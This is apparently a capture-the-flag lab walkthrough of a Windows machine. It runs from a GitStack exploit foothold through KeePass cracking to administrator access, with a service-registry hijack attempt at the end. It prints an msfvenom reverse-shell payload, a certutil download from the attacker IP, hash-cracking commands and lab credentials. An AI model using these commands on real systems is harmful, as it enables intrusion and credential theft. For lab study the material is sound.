cybersec_labs_windows_privilege_stack_walkthrough

Walkthrough Stack

After a period of regular privilege escalation attempts, I realized that I made a mistake, but it also made me more impressed and eager to try

Seriously, you'll find it fun

machine ip : 172.31.1.12

my ip : 10.10.0.33

Port information 

172.31.1.12:80                     Open

172.31.1.12:139                    Open
172.31.1.12:135                    Open
172.31.1.12:445                    Open
172.31.1.12:3389                   Open
172.31.1.12:5985                   Open
172.31.1.12:47001                  Open
172.31.1.12:49152                  Open
172.31.1.12:49153                  Open
172.31.1.12:49154                  Open
172.31.1.12:49155                  Open
172.31.1.12:49162                  Open
172.31.1.12:49163                  Open

172.31.1.12:49164                  Open

    I do the first thing is test  port of 135,139,445 anonymous and try to find some share folder or someusername but nothing can found. so i view the website in 80 port.

    This is a django website,and we can find three route,we can login /gitstack/ with default cred, and find the finger is  gitstack 2.3.10.

searchsploit gitstack 2.3.10

The foothold

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.33 LPORT=23 -f exe -o rev.exe
edit the payload => command = "whoami" =>
certutil -urlcache -split -f http://10.10.0.33/rev.exe

and run it again, the command -> command = "rev.exe" to get a shell -> user ower john

We can get the access.txt

access.txt : reb656565983289247427842gtamf6

Privilege to Administrator

I run the systeminfo command can find the machine have 202 patch,and for this reason I wasted some time bypassing patch fixes,i will mention it in the beyond root section

Run winpeas to find it have keepass profile

Install the keepass in my windows machine,i found it need password

I tried KeeFarce first to get the password but it didn't work

So i use keepass2john to crack it

keepass2john pass.kdbx >> hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash --show

The password is princess ,now we can open the kdbx file

And copy the password to paste it,The password is secur3_apass262
So use evil-winrm to login it:

evil-winrm -i 172.31.1.12 -u 'administrator' -p 'secur3_apass262'

Beyond root

As mentioned earlier I wasted a lot of time bypassing patch fixes，so when i get the administrator, i login it and change remote settings to let's john to login, i want to see the exploit does it really not work

xfreerdp /u:administrator /p:secur3_apass262 /v:172.31.1.12

xfreerdp /u:john /p:s3cret123SEc /v:172.31.1.12

When i run beRoot.exe.i can find a service name of spooler, this service is vuln service,but not running.Even though we can modify the registry, we don't have permission to reboot

https://github.com/dievus/printspoofer

reg add HKLM\SYSTEM\CurrentControlSet\Services\Spooler /v ImagePath /t REG_EXPAND_SZ /d C:\users\john\desktop\rev.exe /f

sc qc spooler ->we can find it run by localsystem

sc sdshow spooler

SY mean localsystem

RP mean start service

WP mean stop service

So if we want to by change the service from register , we can't stil restart it.

But what we can do is, elevate adminstrator to system lol

if we can run "sc start spooler",we can get a system shell

Finally, i want to remember that I actually spent an hour and a half trying the bypass patch,"a fool"